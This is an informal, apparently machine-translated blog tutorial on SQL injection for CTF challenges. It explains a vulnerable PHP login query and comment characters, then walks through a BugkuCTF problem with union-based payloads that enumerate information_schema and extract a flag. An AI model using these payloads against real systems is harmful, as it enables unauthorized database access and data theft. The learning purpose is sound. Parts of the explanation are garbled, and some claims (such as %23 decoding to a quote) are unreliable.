SQL-1
1. Why should we understand this knowledge
2. Principle
3. Own understanding and practice
4. CTF title case
The following statement may say it's not very friendly, so please comment if sensitive words I, the author would change
daily complain discourse: a headache when it comes to SQL, but SQL injection in the Web which is really the most important, although in reality SQL injection is very rare, but it does not affect the CTF to produce these questions, and it is particularly nonsense. Doing it will give you two SQL injection problems, especially those comprehensive questions, obviously PHP code audit, and code after audit (payload) Bypass, it's good, after reading the code, I have to find that I am connected to the database, good guy, sql injection, I admit that sql injection is really difficult for me, the online resources are generally the same, look at the writeup of the big guy's SQL injection, I found that we are looking at the same SQL injection? Alas, after looking at the payload of SQL injection, I understand that SQL injection really depends on the usual experience and the understanding of SQL syntax
Why should we understand this knowledge
SQL injection still ranks in the top ten in the world, so CTF often has SQL injection problems, but SQL injection is really not simple in my eyes, so CTF SQL injection is actually not simple, mainly SQL injection in CTF Mainly by bypassing and blasting (puzzing), the basic routine of CTF is to let you filter all the SQL injection statements you previously checked. In addition to giving you headaches, I can't do anything else with CTF, so CTF seems to be SQL injection In fact, it is to get out of a chicken like me. Its purpose is to let you understand the underlying principles. Don't always rely on other people's payloads, so I understand CTF. I will learn it now.principle
First of all, why there is SQL injection, and there are not many people who will show you a line of PHP code directly (why is it PHP code, don't ask me, ask is that CTF is basically PHP code)$result=$link->query("select * from `user` where username='$user' and pwd='$pwd'");
Seeing this, some little white may not understand, so I changed it
$result=$link->query("select * from `user` where username='你输入的用户名' and pwd='你输入的密码'");
If you do n’t understand it, I, I, I will continue to write. I ’m going to take
a look at it, ah,
no problem, is there anything wrong with this line of code? No problem, today the old
man will give you some questions. Payload: The username you entered = admin% 23 (') or 1 = 1 # (//)
Don't worry about seeing this answer. Let's analyze first, why a few points% 23,1 = 1, #
no doubt saw my blog's good brother must have seen other The blogger's sql injection, but they didn't say why? Don't ask why, the question is to copy
1.% 23 to me because php may url decode the username you enter urldecode (% 23) = '
2.1 = 1 Everyone who learns computer languages understands that 1 = 1 and the answer is true
3. # Simple to say in different languages # Undoubtedly express the comment character. For example, python, ok, I will know this one
4. // Do you want me to say, comment Symbol
5. There is also why I do n’t write the URL encoding, do n’t ask me why, I forgot, I ’m lazy to check and
write the payload
$result=$link->query("select * from `user` where username='admin’ or 1=1#' and pwd='$pwd'");
It ’s definitely not interesting to see this. Let me show you a big baby. Do
n’t talk too much, real men never look back, look at the explosion.
Simply say that the gray code is commented. The
comment must say a few more words:
There are three types of Mysql comment symbols:
1, # ...
2, "-" Caution - there is a space after the
3 / ... /
reading results please calm, let the old lady setting them out
here the most important thing is the code 'or 1 = 1 simply closed front and then to a Real guys, computer languages should understand that the answer to false or true is true.
Some big bloggers are both 'and 1 = 1. Actually, I don't understand, but the principle is the same. In short, let the equation be true, whatever you want. Playing,
you must be wondering why many bigwigs use 'and 1 = 1 or' in or 'and 1 = 2.
First of all, you understand what the result of the above code is after the execution of the sql statement
1. True
2. View in php Is there any single quotes in the code? If there is of course you just manually help him, the page problem will not be very big, but without you adding a ', it must be wrong in the SQL statement, so it will report an error
3. false
fact, many pages is to call database, and help They compiled a good number
Id =? Common on this stuff, such as id = 1 'and 1 = 1 in sql syntax, this statement is true so the page will be expressed in normal
contrary, it is an error, the error can then very happy, An error can indicate that the SQL statement can be executed. Simply tell you, as long as you close the front one, please feel free to do other SQL statements later. As long as you understand the SQL statement deeply, please feel free to don't need to face me.
Let me tell you first, the SQL injection method is divided into these points
1. Boolean injection
2. Joint injection
3. Multi-statement injection
4. Error injection
5. Delayed injection
6. Inline injection
Today we will talk about the simplest joint injection
. It is said that the mysql statement is about
to come to some real guys (the premise
must be understood before). I must give you a few treasures.
1. order by (group by)
is a sorting function in the mysql statement. Oh, how can the order by number tell how many columns there are in the database? There are not many people talking about it
, just go directly to the picture.
First of all, the user table of my database has only three columns.
I do n’t want to say anything more when
you see this. The order of id has changed, it means that he has sorted, 3, then look at the third column, I lost, l-> w-> z, understand that
Order by number represents the number of columns to sort, if it exceeds The number of columns in the database will inevitably not be
sorted
. 2. information_schema is not much talked about directly, the picture above is OK?
3. This is a database I often build, and should I say that as long as you create a database, he already has information_schema Simply put, it is the built-in data table of the database, but why do you want to use this What mysql, performance_schema, sys system tables and why not use information_schema this table, come come, it came up
Official discourse: information_schema This data table holds the information of all databases in the MySQL server. Such as database name, database table, data type and access authority of table column. To make it simpler, on this MySQL server, exactly which databases are there, which tables are there in each database, what are the field types of each table, what permissions does each database need to access, and so on are stored in the information_schema table.
The data type of Information_schema is actually a php dictionary,
so the old
man must show you the key and value of this dictionary 1.SCHEMATA
2.Tables
3.Columns
4.group_concat After
reading the value of each key above, I lost so much, people Where will be dizzy, so we have to use group_concat to filter, for example, we filter out the SCHEMATA_name in SCHEMATA, which is the data table.Can
you see this function automatically helps us put the data in one row, so this is why the big guy they will use this function, or else is not the case, the site will only print data of the first line
5.union select
this stuff is certainly a lot of people confused, do not worry author with you, I was very ignorant force
until until until I I tried it myself to understand what this thing is.I
saw this and I instantly understood that it is the same as the command line. The union is executed and printed like the & on the command line.
However, after testing, I also understand why the big brothers want to get the database. how many columns the
so really, really important, these do-it-yourself, can gain a lot of things
good I know of joint Into these, since there will be a new supplementary
I still suggest that you really need to try it yourself, which can improve a lot.
Simple CTF joint injection is not difficult. The
common routine is to filter the select union,
but still get a good method from some bigwigs.
Three-step method:
1. Find the injection point
2. Fuzz out unfiltered characters
3. Construct payload / write script
CTF title case
Transcript of the web question of BugkuCTF
Trilogy without comment character:
1. '
Analyzing shaping a character or
if it is not close behind the shaping
2.' =. 1. 1 and
3. '= 2. 1 and
through the upper trilogy attempt
to add comment character
so annotated after the break trilogy
found that the third step echoed back
and blind daily behavior is
input 1 'order by 4 #
page normal
input 1' order by 5 #
so that the table has four data
inputs
1' union select 1,group_concat(schema_name),3,4 from information_schema.schemata #
I found that this situation is a bit interesting, and then I found that the previous sql statement is true and prints one line by the local database test. Change one line to false
1' and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata #
Input
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=’skctf_flag’ #
Get the table name fl4g
1’and 1=2 union select column_name,2,3,4 from information_schema.columns where table_name=‘fl4g’#
Get the column name skctf_flag
1’and 1=2 union select skctf_flag,2,3,4 from fl4g#
After getting the flag,
I feel that this question is really very cumbersome, so you can check the transcript of the web question of this big guy's writeup
BugkuCTF
